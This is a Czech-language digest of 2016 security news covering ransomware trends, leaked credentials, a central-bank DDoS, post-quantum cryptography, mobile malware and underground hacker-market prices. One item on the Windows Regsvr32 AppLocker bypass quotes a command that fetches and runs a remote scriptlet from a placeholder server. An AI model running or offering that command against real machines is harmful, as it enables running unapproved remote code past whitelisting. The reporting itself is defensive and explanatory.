Jak se proti několik let starému červovi bránit? Bezpečnostní experti důrazně doporučují nainstalovat do počítače všechny přístupné bezpečnostní aktualizace, které jsou dostupné přes systém automatických aktualizací nebo přes stránku Windows Update.


Vyhledávání odposlechů

6.5.2016 Bezpečnost
Miniaturizace elektronického zařízení má za cíl zvýšení pohodlí užívání. Dává to také široké možnosti k narušení soukromí pomocí odposlechů a minikamer malých rozměrů, které lze snadno ukrýt v místnostech nebo zakamuflovat v předmětech každodenní potřeby.

Mnoho situací vyžadujeochranu důvěrných informací, utajení údajů obchodních partnerů, diskrétnost vedených obchodních rozhovorů, na kterých závisí finanční bezpečí firmy. Nekalá konkurence je schopná zajít velmi daleko, aby ukradla důležité údaje. Instalují skryté kamery, odposlouchávají pomocí štěnic a jiných zařízení dostupných na trhu, které jsou pouhým okem neodhalitelné. Využívání služeb firem odhalujících odposlechy je velmi nákladné a nedá se vždy provést tak, aby nevzbudilo podezření spolupracovníků. Proto se vyplatí investovat do zařízení, které umožní ochránit firemní prostory před špionáží a v případě štěnic nebo mikrokamer umožní lokalizovat a zneškodnit je.

Detektory odposlechu se hodí také ve velmi soukromých situacích, kdy se veřejně známá osoba chce zabezpečit před odposlechem ze strany nepovolaných osob a únikem intimního obsahu do médií

Detektory odposlechu a skrytých kamer jsou vynikajícími zařízeními k zabezpečení svého soukromí a vždy, když máme podezření, že kdosi zasahuje do našich životů bez našeho vědomí.

Detektory odposlechu

Rádiovou štěnici je možné koupit na internetu již za několik stovek korun. Je možné je instalovat jak v kancelářích, tak v bytech nebo ve vozidlech. Kamuflování odposlechů v předmětech každodenní potřeby či v nich použité moderní technologie umožňují monitoring trvající i několik týdnů diskrétním způsobem nevzbuzujícím žádné podezření. Na trhu jsou dostupné také odposlechy GSM. Díky technologii globálního spojení je možné v kterékoliv chvíli zavolat z jakéhokoliv místa na světě na SIM kartu ukrytou např. v dálkovém napájení nebo v napájecí liště a diskrétním způsobem odposlouchávat okolí.

Vyhledávání odposlechů Spy Shop

Vyhledávání odposlechů je stejně oblíbené, jako samotné odposlouchávání. Zároveň s rozvojem odposlechových technik se rozvíjejí i způsoby jejich odhalování. V současnosti se na trhu nachází celá řada zařízení, které umožňují odhalovat odposlechy.

Nejčastějším řešením jsou skenery frekvence - moderní detektory spolupracující s měřiči jejich intenzity. Takováto kombinace umožňuje zachytit signál odposlechu a zaměřit jeho zdroj. V okolí, kde se nachází celá řada vysílačů signálů, je základem odhalení odposlouchávacího zařízení připojení se k přenosu a jeho odposlouchávání.

Pouze pokročilé skenery signálů a měřiče jejich síly s vysokou úrovní přesnosti se v houštině přenosů osvědčí.

Detektory skrytých kamer

Současné skryté kamery mají rozměry menší než zapalovač a jejich objektivy se šířkou počítanou v milimetrech umožňují nahrávat obraz v kvalitě i Full HD. Skryté kamery v předmětech každodenní potřeby slouží k diskrétnímu nahrávání a získání cenných informací. Miniaturní kamery s GSM modulem nebo IP kamery umožňují vzdálené monitorování místnosti pomocí mobilního telefonu nebo počítače. Takováto zařízení jsou prakticky neviditelné pouhým okem a stávají se potencionálním rizikem úniku cenných informací jak soukromých, tak firemních.

Spolu s rozvojem technik špionáže se rozvinuly také metody kontrašpionáže. Objevila se specializovaná zařízení k vyhledávání skrytých kamer. Současná technika je schopna odhalit jak drátové tak i bezdrátové kamery, zapnuté nebo ne. Dostupná v rozumných cenách a legální umožňuje dokonce i malým firmám chránit se před následky úniku informací.


Hacker Guccifer: Do e-mailu Clintonové jsem pronikl snadno

6.5.2016 Kriminalita
Vniknout do soukromého mailu demokratky Hillary Clintonové nebyl problém. V rozhovoru z virginského vězení to pro televizi FoxNews prohlásil bývalý rumunský hacker Marcel Lehel Lazar známý pod přezdívkou Guccifer.
Rumunský hacker Marcel Lehel Lazar známý pod přezdívkou Guccifer (druhý zprava)

„Pro mě to bylo snadné... a pro každého,“ řekl. Tento kousek se mu měl povést několikrát v roce 2013, kdy Clintonová řídila diplomacii, a jak se ukázalo, služební korespondenci vyřizovala ze své soukromé adresy.

Guccifer rovněž řekl, že uschoval dva gigabyty údajů, které jsou prý příliš žhavé a obsahují „záležitosti národní bezpečnosti“. Zda mohou pocházet i z političčiny pošty, není známo. Vyšetřování e-mailů Clintonové včetně možného úniku utajovaných informací běží od loňska, není uzavřené a v kampani se stalo vítanou municí pro republikána Donalda Trumpa.

Hacker pronikl do pošty několika celebrit i prezidentské rodiny Bushů. Letos v dubnu byl vydán do USA z Rumunska, kde si už odpykával sedmiletý trest za kyberútoky.


ESET: útočníci používají stále více druhů zranitelností
6.5.2016
Zdroj:Živě Bezpečnost

Podívejte se, jak to vypadá ve slovenské centrále společnosti ESET zaměřené na IT bezpečnost
Na co si dát pozor, abyste nepřišli o data na Windows, OS X nebo Androidu?
Největším trendem je ransomware
ESET: útočníci používají stále více druhů zranitelností
Společnost ESET založenou v roce 1992 (reálně už zakladatelé vyvíjeli produkt od roku 1987) asi v našich končinách netřeba díky produktu NOD32 nebo Smart Security příliš představovat, stejně jako například konkurenční Avast nebo AVG. ESET je stále soukromou společností, ale daří se jí růst po celém světě.

Momentálně už má téměř 1 200 zaměstnanců, třetina z nich přitom tvoří inženýry. Software pro koncové uživatele i firmy je distribuován po celém světě a s tím souvisí i šíře podpory a získaná data. Jak to vypadá přímo v centrále ESETu, jaké jsou trendy a další spoustu zajímavostí, to se díky reportáži dozvíte v článku.

NOD: Nemocnice na Okraji Disku

Trochu vtipným začátkem je původ značky prvního produktu NOD, který vycházel z tehdy populárního seriálu „Nemocnice na kraji města“. Protože původní tvůrci viděli jasnou spojitost s viry, se kterými se musí potýkat i živé organismy.

IMG_3218.jpgIMG_3219.jpg

ESET se může pochlubit velkou spoustou ocenění v mnoha testech antivirů a bezpečnostního softwaru po celém světě, i když je konkurence v této oblasti poměrně velká. Podle IDC je ESET pětkou v celosvětovém srovnání, ale třeba v Japonsku je ESET nejoblíbenějším řešením a tvoří jeden z největších trhů. Software používá přibližně 100 milionů uživatelů, ale pokud jde o rozdělení mezi koncovými řešeními a firemními, je to přibližně 50 na 50.

 2016-05-05 v 22.46.17.jpg

Počet zaměstnanců ESETu se v rámci celého světa dostane brzy na k 1 200, třetina tvoří R&D

Pokud jde o vývoj, ESET má týmy u nás v Praze a Jablonci nad Nisou, několik dalších pak i v ostatních zemích. Ve všech zemích kde je ESET k dispozici jde ale hlavě o distributory. Zástupci se vyjádřili i k problému dostupnosti mladých „mozků“, které je stále těžké získat. Obory zaměřené na kyberbezpečnost teprve začínají a po letech ve školách je situace na trhu stejně zcela jiná. Realitou je tak většinou jediné řešení - je nutné si nadané studenty „vychovat“.

Houston aneb hlavní kontrolní centrum

Vývoj antiviru se dělí na dvě části – JAK detekovat (jádro) a CO (viruslab). Detekce se točí kolem velkého množství vzorků virů pro zlepšení přesnosti rozpoznání i s možností univerzálního použití (už nejde o hashe jako v historii). Cílem je, aby bylo možné signaturou pokrýt desítky tisíc virů ze stejné třídy, ale zároveň aby nedocházelo k falešné detekci.

IMG_3222.jpg

Houston - centrální místnost

Denně na servery ESET chodí 300 tisíc unikátních souborů, které ještě nikdy předtím nebyly rozpoznané a dále se automaticky zpracovávají. Tvůrci škodlivých programů totiž často používají právě polymorfismus, který automaticky generuje obrovská kvanta verzí souborů (virů) které se liší a nějaký jednoduchý systém rozpoznání pomocí hashů tak už není možný. Jádro malwaru zůstává většinou zachované nebo se v rámci verzí mění velmi málo, ale co se mění hodně, jsou různé „ochranné vrstvy“ binárních souborů.

IMG_3223.jpg

Hlavní obrazovky v „Houstenu“ ukazují detekce malwaru na jednotlivých místech planety, kde uživatelé zároveň používají ESET. Čím červenější, tím větší počet

V rámci viruslabů mezi sebou jednotlivé společnosti spolupracují, konkurence je hlavně v technologii a marketingu. Po automatickém zpracovávání se do zajímavých souborů a zkoumání pouští i lidští analytici, kteří mají k dispozici dva počítače – jeden pro běžnou práci napojený na firemní síť a druhý počítač, který je na oddělené síti a může se na něm infikovaný soubor pouštět pro sledování jeho chování v reálném čase. Zkoumání může probíhat klidně i hodiny či dny, pokud jde o podrobnější vyšetřování většího nebezpečí či útoku, tak i měsíce.

Karel JavĹŻrek
Zvětšit video
Masivní nástup ransomware na desktopu i Androidu

Ransomware je druh malwaru, který různým způsobem blokuje přístup k zařízení nebo k vašim datům a pro odemknutí vyžaduje různě vysoké výkupné, které musíte zaplatit. Moderní ransomware používá i techniky pro urychlení zaplacení, například časový odpočet, po kterém odmaže tisíc souborů a podobně. Některé už jsou vychytané na takové úrovni, že po infekci uživatel nějakou dobu nic nepozná, potichu vyčkávají a objeví se například až po týdnu a podobně.

 2016-05-05 v 21.56.56.jpg

Často se využívá sociálního hackingu a cílem je přesvědčit uživatele, aby souboru důvěřoval

Nejhorším problémem je, že propracovaný malware dokáže simulovat na Windows i na Androidu například přihlašovací obrazovky, díky čemuž dokáže donutit uživatele zadat administrátorské heslo do falešného pole a tak ho získat. Vzhledem k tomu, že ransomware soubory zašifruje nebo přístup do systému zahesluje, takřka neexistuje systém „vyčištění“. I když některé starší lze už dnes odšifrovat, moderní už používají silné šifry, takže zašifrované soubory nelze rozšifrovat.

 2016-05-05 v 21.56.25.jpg 2016-05-05 v 21.57.10.jpg

Ukázky ransomwaru a požadavků na výkupné pro dešifrování dat

Uživateli tak nezbývá než zaplatit nebo přijít o data. Tvůrci ransomware díky tomu získávají obrovské množství peněz, což jim umožňuje ještě dále vylepšovat tento typ malwaru a celého systému. Už se dokonce objevují i ransomware nejen s návodem, ale i podporou, která vám poradí, jak pomocí bitcoinu zaplatit a získat dešifrovací klíč. Vše je pochopitelně řešené přes TOR a darknet.

 2016-05-05 v 22.04.02.jpg

Tvůrcům ransomwaru nechybí ani kreativita a klidně si zahrají hru, kdy vám smažou tisíc souborů za 24 hodin nebo po každém restartu počítače

Podle statistik už jedna z pěti organizací zažila útok pomocí ransomware, problém ale je, že se většinou vše tají, protože by to znamenalo ztrátu reputace, takže často raději zaplatí. Útočníci tak z tohoto přístupu začínají mít skvělý byznys, protože některý ransomware má schopnost šifrovat i data na vzdálených discích, zálohách a dalších zařízení na síti a v takovém případě firmě nezbývá nic jiného, než zaplatit. Výsledek je přitom nejistý, ani poté totiž nemají jistotu, že dešifrovací klíč dostanou a útočník může klidně požadovat ještě větší výkupné.

Jak se vyvarovat infekci?

Mezi hlavní kanály, jak se malware dostane na počítač, patří stažení aplikací z internetových stránek, stažení infikovaných aplikacích z „oficiálních“ webů známých aplikací, infikovaná příloha v emailu a trojan, který dodatečně stáhne škodlivý soubor. Samostatnou kapitolou je pak ruční vzdálená instalace přes vzdálenou plochu na daný počítač.

Základ tak je nestahovat nejen aplikace „třetích“ stran do operačních systémů, ale také si dát pozor i na ty, které se tváří jako oficiální. Jeden z případů ukázal, že útočníci vytvořili duplicitní web na stažení běžně používaného zdarma dostupného softwaru, přičemž po kliknutí na odkaz se většinou začal stahovat oficiální soubor. Pro počítače s vybranou ip adresou však došlo ke stažení upravené infikované verze, která se však tvářila zcela normálně a uživatel nic nepoznal ani po instalaci.

 2016-05-05 v 22.01.07.jpg

KeRanger se dostal do OS X přes infikovanou aplikaci Transmission přímo na oficiálních stránkách, protože měl i legitimní vývojářský certifikát. Došlo tak ke třem úspěšným podvodům v jednom až k finální instalaci na počítač uživatele

V případě desktopu to platí pro Windows i pro OS X. Na Androidu se rovněž vyvarujte stahování a instalací aplikací třetích stran, vždy používejte pouze oficiální obchody - App Store, Play Store, Windows Store a kontrolujte recenze, zda nejsou podezřele negativní.

Aktualizujte vše, zálohujte vše a používejte antivirus

Dalším problémem, který se rozmáhá, je že záškodníci dokáží do počítače nejdříve dostat neškodný program a s kódem, který žádný antivirus nedetekuje, protože nic škodlivého nedělá.

Avšak i taková aplikace může například prohledat systém a zjistit slabinu například v neaktualizované verzi Acrobat Readeru a podobně, dodatečně získá zvýšená práva a zajistí funkční malware skrze tuto díru. Proti tomuto se nelze ochránit žádnou databází a detekcí, proto moderní antiviry prohledávají počítač na programy, které jsou staré a neaktualizované a jsou tak potenciálním nebezpečím.

Další důležitou částí je zálohování, ideálně velmi často a v nejlepším případě do offline zálohy, která tak nemůže být zašifrovaná pomocí ransomware. Třetí základní radou je pochopitelně používání antiviru nebo podobného bezpečnostního řešení.


Ruský hacker dal k volně dispozici 232 milionů hesel k e-mailům

5.5.2016 Hacking
Dnes, Jan Vítek, aktualitaAnonymní ruský hacker, který si sám říká "the Collector" dal volně k dispozici celou svou databázi čítající 232 milionů údajů o e-mailových účtech, a to včetně hesel. Ohroženi se mohou cítit především uživatelé Mail.ru, ale také Yahoo, Hotmail či Gmail.
Nicméně situace nebude tak vážná, jak se může na první pohled jevit. Mladý sběratel dal k dispozici data, která by v ideálním případě (jak pro koho) mohla být využita pro přístup k 232 milionům unikátních e-mailových účtů na různých serverech a databáze obsahuje celkem 1,17 miliardy záznamů. Původně za tato data chtěl jen 50 rublů, ale nakonec se rozhodl, že mu budou stačit "lajky" na jeho sociálním účtu a vedle nich se dočkal také slov chvály.

K datům se tak pochopitelně mohli snadno dostat i lidé z firmy Holden Security LLC starající se o zabezpečení, dle nichž se v databázi nachází přes 57 milionů přihlašovacích údajů k účtům na Mail.ru (tato služba má aktuálně 64 milionů uživatelů), dále 40 milionů na Yahoo Mail, 33 milionů na Microsoft Hotmail a 24 milionů na Gmail. Je ale otázka, do jaké míry je "the Collector" hacker a do jaké míry bychom ho mohli označit jen za nadšence, který jen rád sbírá takové údaje. Firma totiž oznámila, že přinejmenším 85 procent z databáze jsou již dříve zveřejněná data, a tak je na této kolekci pozoruhodné především to, že jde o největší databázi svého druhu, kterou dal volně k dispozici pouze jednotlivec.

Společnost Holden Security LLC se specializuje na kyberzločiny ve východní Evropě a sama říká, že s hackery nevyjednává tak, aby získala jejich data za odměnu. Zde to ale udělat mohla, neboť mladý Rus získal pouze několik palců nahoru. K této záležitosti se také vyjádřili zástupci serveru Mail.ru a Microsoftu, zatímco Yahoo a Google zatím mlčí.

Mail.ru vzkázal svým uživatelům, že uvolněné informace zkoumá a pak bude případně varovat své uživatele, kteří by mohli být ohroženi. Dosud totiž nebyla nalezena žádná kombinace jména a hesla, která by fungovala. Microsoft se zase slovy svého mluvčího vyjádřil prostě tak, že podobné úniky jsou bohužel realita. Microsoft využívá jistá bezpečnostní opatření, která mají za úkol detekovat nestandardní využití účtu a v takovém případě si server od přihlašujícího se uživatle vyžádá další informace, aby ověřil jeho identitu.

Z 232 milionů záznamů tu jsou ale 4 miliony, které ještě nikdy dříve neunikly, a právě na ty se tak nyní zaměřují bezpečnostní firmy a provozovatelé serverů. Nutno poznamenat, že útočníkům jejich práci často ulehčují samotní uživatelé. Když v roce 2013 uniklo nějakých 152 milionů jmen a hesel z firmy Adobe, která je ukládala pomocí formátu Data Encryption Standard (DES), objevilo se, že pozoruhodně velké množství lidí si vybralo jako heslo "123456" či jinou jednoduchou posloupnost, pak bylo populární "password" nebo "qwerty".

Co ale může udělat samotný uživatel, aby zjistil, zda jeho přihlašovací údaje mohly být ukradeny? Může využít třeba databázi na adrese haveibeenpwned.com, kde stále jednoznačně "vede" společnost Adobe s výše zmíněnými 152 miliony přihlašovacích údajů.


Hackeři zaútočili na web řecké centrální banky. Chystají se na další banky ve světě

5.5.2016 Hacking
Počítačoví piráti napojení na skupinu Anonymous vyřadili z provozu internetovou stránku řecké centrální banky. Jde podle nich o první ze světových centrálních bank, na které hodlají během měsíce zaútočit. Informoval o tom ve středu zpravodajský server CNN.
Web řecké centrální banky v úterý na několik minut spadl, než se jej personálu banky podařilo opět obnovit.

Poradce banky pro styk s veřejností Spyros Frangos řekl CNN, že žádné dokumenty nebyly ukradeny ani zničeny. Banka při útoku nepřišla o žádné peníze.

Útok byl typu DDOS, tedy odepření služby provedené distribuovaným útokem. Probíhá tak, že směrem k napadanému serveru je vysláno obrovské množství požadavků. K serveru, pokud přímo nezkolabuje, se pak nemohou dostat legitimní uživatelé.

CNN napsal, že útok byl relativně slabý. Hackeři ovšem na serveru YouTube uvedli, že si vzali na mušku globální finanční systém, který je podle nich "tyranskou institucí".

Hodlají prý zaútočit i na weby jiných centrálních bank z celého světa. Kampaň, kterou pojmenovali Operace Ikaros, prý potrvá 30 dní.

Skupina Anonymous se v uplynulých letech rozštěpila. Její název nyní používá mnoho hackerských skupin, které navzájem nemusí být nijak propojené. Inkriminované video na internetu zveřejnila okrajová přidružená skupina.


Klasické šifrování už nestačí, kvantové počítače jej rozcupují

4.5.2016 Šifrování
Není tajemstvím, že mnoho z dnes užívaných metod šifrování by ve světě s kvantovými počítači, jejichž masovější nasazení se blíží, bylo zcela nepoužitelných. NIST, respektovaná organizace z oblasti standardů a technologií, hledá, jak z tohoto problému ven.

Právě NIST (National Institute of Standards and Technology) nedávno vydal zprávu, jejímž hlavním tématem byly šifrovací standardy v kvantovém světě. Zpráva naznačuje možnou dlouhodobou strategii, která by se problému vyhnula ještě předtím, než vůbec nastane.

„V poslední době šlo na kvantové počítače mnoho prostředků určených pro výzkum, a každý, od velkých počítačových společností přes vlády, chtějí, aby jejich šifrovací alhoritmy byly, jak my říkáme, ‘kvantově odolné,‘“ vysvětluje matematik NISTu Dustin Moody. „Takže až někdo postaví první kvantový počítač velkého rozsahu, chceme už mít k dispozici algoritmy, které se neprolomí.“

Současná kryptografie se často spoléhá na techniku matematického rozkladu velkých čísel k zajištění bezpečnosti, ale vědci z MIT a rakouské Univerzity Innsbruck nedávno představili, čemu říkají první pětiatomový kvantový počítač, schopný takové šifrovací metody prolomit.

Zatímco tradiční počítače operují s jedničkami a nulami, kvantové počítače se spoléhají na kvantové bity, tzv. „qubity,“ které mohou být zároveň 0 i 1 – tedy ve stavu, kterému říkáme superpozice. A superpozice slibuje obrovskou efektivitu a navýšení výkonu oproti současným počítačům.

Jedno z doporučení ve zprávě NISTu hovoří o tom, že společnosti by se měly soustředit na „kryptografickou obratnost,“ tedy schopnost rychle přejít na jiný druh šifrování -- takový, který bude bezpečnější. Vytvořit tyto bezpečné algoritmy je pak dlouhodobým cílem.

Za účelem dosažení tohoto cíle se vypíše soutěž, v níž členové veřejnosti navrhnou a otestují slibné nové šifrovací metody. Podobná soutěž se přitom už dříve osvědčila – vedla např. k vývoji SHA-3 hashovacích funkcí, používaných pro autentizaci digitálních zpráv. NIST plánuje zahájit novou soutěž během několika málo měsíců.

„Bude to dlouhý proces zahrnující veřejné prověřování algoritmů, odolných vůči kvantové technologii,“ říká Moody. „A nečekáme, že najdeme jen jednoho vítěze.“

Hned několik z dnes běžně fungujících bezpečnostních mechanismů by mohlo být prolomeno kvantovým počítačem, a to např. veřejné šifrovací klíče nebo digitální podpisy, takže bude třeba vytvořit vícero nových alternativ.

Ačkoli jsou kvantové počítače a s nimi související bezpečnostní hrozba ještě vzdálená budoucnost, NIST nehodlá ztrácet čas.

„Historicky trvalo dlouho, než se rozhodlo, že je šifrovací systém dobrý, a než jsme ho zařadili jako standard do produktů na trhu – může to trvat 10 i 20 let,“ pokračuje Moody. „Společnosti začaly reagovat na nové změny, a my cítíme, že je čas začít na tom pracovat.“


Android opravuje šest kritických chyb
3.5.2016
Zranitelnosti
Google jako tradičně na začátku měsíce vydal souhrn oprav pro operační systém Android, nově pod názvem Android Security Bulletin namísto Nexus Security Bulletin. Lehce se také změnila klasifikace závažnosti chyb. Tentokrát bylo opraveno šest kritických chyb, konkrétně v kernelu, ovladači Nvidia, ovladačích Qualcommu nebo v mediaserveru.

Partneři, obvykle výrobci zařízení s Androidem, byli o chybách informováni už s měsíčním předstihem, aby mohli připravovat opravy. Za jak dlouho a v jaké míře se k uživatelům dostanou, ale velmi záleží na konkrétním výrobci. Řada Nexus dostává aktualizaci souběžně s vydáním bulletinu. Google nemá zprávy o zneužívání žádné z chyb v praxi.


Hackeři napadli herní servery Minecraftu, do oběhu se dostaly údaje sedmi milionů hráčů
3.5.2016
Hacking

Lifeboat je oblíbená služba, která sdružuje několik typů herních serverů pro populární Minecraft. Už na začátku ledna se však útočníci dostali do databáze uživatelských účtů, čímž získali údaje sedmi milionů registrovaných uživatelů. Provozovatelé potvrdili únik údajů až nyní pro Motherboard a svoje uživatele o možných rizicích neinformovali vůbec.

S informací přišel Troy Hunt, který provozuje web Have I Been Pwned, na kterém si můžete ověřit, zda je váš e-mail součástí některého z balíků uniklých dat. Podle něj se útočníci dostali k e-mailovým adresám, ale také slabě šifrovaným heslům, u níž je velká pravděpodobnost snadného dešifrování.

Provozovatelé služby o úniku dat věděli ihned, rozhodli se však pro nezodpovědné řešení, kdy pouze odeslali uživatelům e-mail s možností resetovat svoje heslo. Důvod jim však sdělen nebyl a efektivita tedy byla pravděpodobně velmi nízká. Proč se rozhodli pro toto řešení, zodpověděl pro Motherboard jeden ze zástupců společnosti - „nechtěli útočníkům prozradit, že o útoku již ví“.


Internetem kolují tisíce virů, stále více jich cílí na chytré telefony a tablety

2.5.2016 Hrozby
V současnosti internetem koluje několik tisíc virů. Při jejich šíření se přitom počítačoví piráti stále častěji zaměřují na mobilní zařízení, tedy na smartphony a tablety. Vyplývá to z analýzy bezpečnostní společnosti Check Point.
„V průběhu března jsme identifikovali více než 1300 různých malwarových rodin, což je drobný pokles oproti předchozímu měsíci. To ovšem neznamená, že by byl březen bezpečnějším měsícem, jen to ukazuje na skutečnost, že kyberzločinci nemusí vyvíjet zcela nový malware pro útočné aktivity,“ uvedl David Řeháček, bezpečnostní odborník ze společnosti Check Point.

Označení malwarová rodina výzkumníci používají pro pojmenování různých škodlivých kódů, které však mají stejný základ. Například vyděračské viry z rodiny ransomware, které zašifrují data na pevném disku a za jejich odemčení požadují výkupné, tvoří pouze jednu „rodinu“. Různě upravených ransomwarů přitom kolují internetem stovky.

Rodin je tedy skutečně „pouze“ 1300, ve skutečnosti se ale aktuální hrozby počítají na tisíce. Klidně i jen drobnou úpravou části zdrojového kódu si totiž kyberzločinci zpravidla zajistí, že již nahlášená a známá počítačová hrozba je najednou úplně nová – většina antivirů je pak na takové hrozby minimálně v prvních dnech jejich rozšíření krátká.

Nárůst mobilních hrozeb
Patrný je nárůst mobilních hrozeb, škodlivé kódy se tedy častěji zaměřují na chytré telefony a tablety. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval,“ podotkl Řeháček s tím, že bezpečnostním expertům v současnosti dělá velké vrásky na čele především hrozba zvaná HummingBad. Právě ta se dostala mezi deset nejrozšířenějších virových nákaz. 

HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak ale může číhat na podvodných webech. Na smartphonech s operačním systémem Android vytváří trvalý rootkit, může se tedy v zařízení maskovat, což velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit.

„Instaluje podvodné aplikace a umožňuje další škodlivé aktivity, jako jsou například instalace keyloggerů, krádeže přihlašovacích údajů a obcházení šifrování e-mailů pro lepší zachycení podnikových dat,“ konstatoval Řeháček.

Jinými slovy počítačoví piráti převezmou nad napadeným přístrojem naprostou kontrolu. Mohou jen vyčkávat a sledovat aktivitu uživatele, stejně tak ale dovedou odchytávat zprávy týkající se internetového bankovnictví. Teoreticky tedy mohou uživatele připravit o peníze.

Zaměřují se na Android
Také další dvě hrozby, které patřily v březnu k těm nejrozšířenějším, cílily na chytré telefony a počítačové tablety. Konkrétně na modely s operačním systémem Android.

Jedním z nich je například AndroRAT, který se dokáže navázat na nějakou legitimní aplikaci. Do mobilního zařízení se tak často dostane bez vědomí uživatele. Ten si jej stáhne zpravidla z neoficiálních internetových obchodů s nějakým jiným programem. Pak už nic nebrání útočníkům, aby převzali plnou kontrolu nad napadeným strojem.

Na pozoru by se měli uživatelé mít i před hrozbou zvanou Iop. „Tento malware instaluje aplikace a zobrazuje nadměrné množství reklam. Množství reklamy a nainstalovaných aplikací neumožňuje uživateli používat přístroj jako obvykle,“ uzavřel Řeháček.

Na Android se počítačoví piráti nezaměřují náhodou. Tato mobilní platforma je aktuálně nejrozšířenější, a tak mají kyberzločinci větší šance, že budou při útocích úspěšní.


Windows 10 mají kritickou zranitelnost

2.5.2016 Zranitelnosti
V operačním systému Windows 10 byla nalezena nová kritická zranitelnost. Kyberzločinci ji mohou zneužít k tomu, aby uživateli podstrčili prakticky libovolný škodlivý kód. Upozornil na to server BRG.
Chybu odhalil bezpečnostní výzkumník Casey Smith. Trhlina se týká programu s názvem Regsvr32, respektive Regsvr64 v případě 64bitové verze systému. Jde v podstatě o nástroj příkazového řádku, který může registrovat různé ovládací prvky v operačním systému.

Kvůli chybě může být zmiňovaný program zneužit ke spuštění prakticky libovolného kódu na cizím počítači. Útočník k tomu nepotřebuje ani práva administrátora. Jediné, co musí udělat, je donutit uživatele spustit v jeho počítači předem připravený škodlivý kód. Ten se může šířit například prostřednictvím nevyžádaných e-mailů.

Kritickou chybu mohou obsahovat i starší verze Windows.
Podle Smithe je problém v tom, že kvůli chybě není nezvaný návštěvník rozpoznán aplikací AppLocker. Ta běžně slouží k rozeznávání důvěryhodných zdrojů ke spouštění aplikací. V praxi to tedy znamená, že na uživatele nevyskočí ani žádná hláška, že by si měl na danou instalaci dát pozor.

Regsvr32 je nedílnou součástí operačního systému Windows už od dob verze XP. Výzkumník však chybu identifikoval zatím pouze v nejnovějších desítkách. Zda ji obsahují také starší verze operačního systému od amerického softwarového gigantu, zatím není jasné.

Záplata zatím chybí
Microsoft zatím pro kritickou zranitelnost nevydal žádnou bezpečností záplatu. Uživatelé sice mohou program Regsvr32 (respektive Regsvr64) zablokovat, pouštět do toho by se nicméně neměli méně zkušení uživatelé.

Samozřejmě je také velmi vhodné myslet na to, na co uživatelé během práce na počítači klikají. Úplně ignorovat by měli nevyžádané e-maily a podezřelé zprávy například na sociálních sítích. Stejně jako u většiny podobných chyb ani u té nové totiž kyberzločinci nic nezmůžou bez přičinění samotného uživatele.


Hacknout něčí účet na Gmailu? Tak to bude 130 dolarů

2.5.2016 Zdroj: Lupa.cz  Hacking

Studie Underground Hacker Markets od Dell SecureWorks ukazuje, že hackeři vlastně nejsou až tak drazí.
Dostat se do účtu na Gmailu, Yahoo či Hotmailu vás bude stát 129 dolarů. Do firemního e-mailového účtu to ale bude za 500 dolarů. Ruské e-mailové účty získáte za 65 až 103 dolarů. Získat přístup na něčí Facebook či Twitter je také za 129 dolarů, ale pokud jde o účty na Vkontakte, tak cena stoupne a budete si muset připravit 194 dolarů, píše ve své studii bezpečnostní firma Dell SecureWorks.

Za podobné ceny můžete mít falešný řidičák v USA, Velké Británii, Německu či Izraeli. Kompletní novou identitu si můžete pořídit za 90 dolarů a získáte fotokopii řidičáku, karty sociálního pojištění a faktury dokladující, že platíte za byt. Podstatně dražší je ale pas, ten z USA stojí mezi 3000 až 10 tisíci dolary.

Kreditní karty jsou oproti tomu levné, VISA či MasterCard pocházející z USA přijdou na sedm dolarů, Premium American Express či Premium Discovery na dolarů třicet.

Velmi levné jsou i trojské koně pro vzdálený přístup (RAT), vyjdou na 5 až 10 dolarů, Angler Exploit Kit ale už 100 až 135 dolarů. Levný může být i DDoS, ceny začínají na pěti dolarech (za hodinu), ale mohou být i přes 500 dolarů. Na vyzkoušenou vám navíc nabídnou pět až deset minut zdarma.

Kompletní studii Underground Hacker Markets (PDF) si samozřejmě můžete prostudovat sami. Zjistíte tam navíc i to, že v řadě případů ceny poměrně ostře klesají.


Chyba ve Windows 10 umožňuje spustit aplikaci bez vědomí uživatele

2.5.2016 Zdroj: Lupa.cz  Zranitelnosti

Těžko si představit, jak je možné, že v nejnovějších Windows můžete na dálku spustit jakoukoliv aplikaci bez vědomí uživatele.
Pokud na počítači s Windows 10 použijete Regsvr32, abyste spustili soubor uložený na vzdáleném systému, podaří se vám to. Bez vědomí uživatele, bez varování před instalací a bude ignorován i případný blacklist (AppLocker). Není potřeba mít práva správce ani nic dalšího. Jediná obrana zatím spočívá v zablokování Regsvr32 na úrovni firewallu (a také Regsvr64).

Důležité je, abyste tuhle zranitelnost pochopili správně – neznamená, že někdo může na dálku na vašem počítači něco spustit. Znamená, že pokud vás (uživatele) někdo přesvědčí ke kliknutí na něco nevhodného, může tím dojít ke spuštění a instalaci čehokoliv, aniž byste si uvědomili, že k něčemu takovému došlo.

Podmínkou samozřejmě je, že něco spustíte (což uživatelé dělají rádi), a také to, že bude dostupný vzdálený systém, který se postará o dodání skriptu. Ten už se pak postará o zbytek.

Podrobnosti přímo od objevitele chyby najdete v Bypass Application Whitelisting Script Protections – Regsvr32.exe & COM Scriptlets (.sct files) a v zásadě stačí použít něco jako „regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll“, ale až tak jednoduché to samozřejmě není. Kompletní proof of concept prozradí více.


Vyčíslete si finanční hodnotu IT rizik

1.5.2016 Rizika
Manažeři zabezpečení běžně musejí dělat těžká rozhodnutí o tom, jaká rizika snižovat, jaká zcela eliminovat nebo převést a konečně která jen akceptovat. I rozpočet na zabezpečení má totiž své meze.

Přijímání rozhodnutí ohledně rizik vyžaduje důkladné chápání dopadu těchto opatření, znalost dostupných ochran a někdy také odvahu učinit těžké rozhodnutí. Cílem tohoto článku je poskytnout rady, které by bezpečnostním manažerům mohly pomoci při tomto obtížném rozhodování o rizicích.

Stanovte dopady

Pokud způsob stanovení rizika není v souladu se samotným podnikáním vaší firmy, potom na tom bude metoda, jak se rizika ošetří, obdobně. Jestliže stále určujete riziko podle staré kvalitativní stupnice „nízké, střední, vysoké“, jak potom můžete posoudit, zda konečné rozhodnutí odpovídají potřebám vaší firmy?

Jak popíšete nejvyššímu vedení nebo členům představenstva, jaký dopad mohou mít příslušná rizika na firmu, a jak odůvodníte investice potřebné pro zabezpečení, abyste je přesvědčili o přínosu přijetí opatření?

